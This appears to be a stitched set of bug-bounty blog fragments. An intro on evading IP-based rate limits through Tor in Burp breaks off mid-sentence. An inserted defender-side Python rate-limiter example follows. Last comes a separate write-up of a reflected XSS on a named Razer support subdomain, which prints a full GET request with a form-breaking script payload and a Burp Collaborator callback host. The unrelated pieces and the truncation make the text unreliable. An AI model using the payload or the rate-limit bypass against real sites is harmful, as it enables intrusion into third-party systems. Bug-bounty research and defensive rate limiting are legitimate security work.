Rate Limit definition
In computer networks, rate limiting is used to control the rate of requests sent or received by a network interface controller. It can be used to prevent DoS attacks and limit web scraping.
Some packages can be used to prevent rate-limit attacks; these packages block based on source IP.
Today I will publish one technique you can use to bypass this kind of protection and earn some bounties.
The first thing you need is to install and configure Tor as a proxy in Burp.
This is a good reference to install and configure Tor in Burp as…
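To show from the defender's side why a limit keyed only on source IP is weak when requests arrive from many different addresses, the following added example (not code from the original post) replays constructed login attempts through a sliding-window limiter keyed on source IP, on target account, or on both. The limiter class, field names, thresholds and sample data are assumptions made for illustration.

```python
from collections import defaultdict, deque


class SlidingWindowLimiter:
    """Allow at most `limit` events per `window` seconds for each key."""

    def __init__(self, limit, window):
        self.limit, self.window = limit, window
        self.events = defaultdict(deque)

    def allow(self, key, now):
        q = self.events[key]
        while q and now - q[0] >= self.window:  # drop events outside the window
            q.popleft()
        if len(q) >= self.limit:
            return False
        q.append(now)
        return True


def count_allowed(attempts, key_fields, limit=5, window=60):
    """Replay (timestamp, source_ip, account) tuples and count those that pass
    a limiter for every field named in key_fields ("ip" and/or "account")."""
    limiters = {f: SlidingWindowLimiter(limit, window) for f in key_fields}
    allowed = 0
    for ts, ip, account in attempts:
        fields = {"ip": ip, "account": account}
        # No short-circuit: an attempt rejected on one key still counts
        # against the other keys that accepted it.
        verdicts = [lim.allow(fields[f], ts) for f, lim in limiters.items()]
        allowed += all(verdicts)
    return allowed


# Constructed sample: 100 attempts, one per second, each from a different
# source address (documentation range), all aimed at the same account.
MANY_SOURCES = [(t, f"198.51.100.{t + 1}", "alice") for t in range(100)]
# Constructed sample: the reverse shape, one source address, 100 accounts.
ONE_SOURCE = [(t, "203.0.113.7", f"user{t}") for t in range(100)]

if __name__ == "__main__":
    for name, data in (("many sources", MANY_SOURCES), ("one source", ONE_SOURCE)):
        for keys in (("ip",), ("account",), ("ip", "account")):
            print(f"{name:12} keyed on {'+'.join(keys):10} -> "
                  f"{count_allowed(data, keys)} of {len(data)} allowed")
```

With the IP-only key every attempt in the first sample is accepted, while the account key (alone or combined with the IP key) caps it at the configured rate; the second sample shows why the IP key is still worth keeping alongside it.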
My name is Mostafa. I am working as an information security engineer, and in my part time I do some bug hunting.
I found 2 vulnerabilities in different subdomains of Razer.
The first one is reflected XSS in (http://drivers.razersupport.com).
When I was searching for XSS, I looked at reflected params and found that the CSRF token was reflected and commented in the HTML response. So this is the first one: I just closed the form tag and wrote an XSS payload, and it was executed.
GET /index.php?_m=k2n4qnfei8t8yk2e7ua78c7m7dd41t.burpcollaborator.net&_a=viewdownload&downloaditemid=800&nav=0Quote%3AOriginally%2C76%2C168%2C11%2C131?_m=downloads&_a=viewdownload&downloaditemid=800&nav=0Quote%3AOriginally%2C76%2C168%2C11%2C131&_m=downloads&_a=viewdownload&downloaditemid=800&nav=0Quote%3AOriginally%2C76%2C168%2C11%2C131?_m=downloads&_a=viewdownload&downloaditemid=800&nav=0Quote%3AOriginally%2C76%2C168%2C11%2C131 → →”></form><h1><script>alert(document.domain)</script></h1> HTTP/1.1
Host: drivers.razersupport.com
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36…
Information Security Engineer And Bug Hunter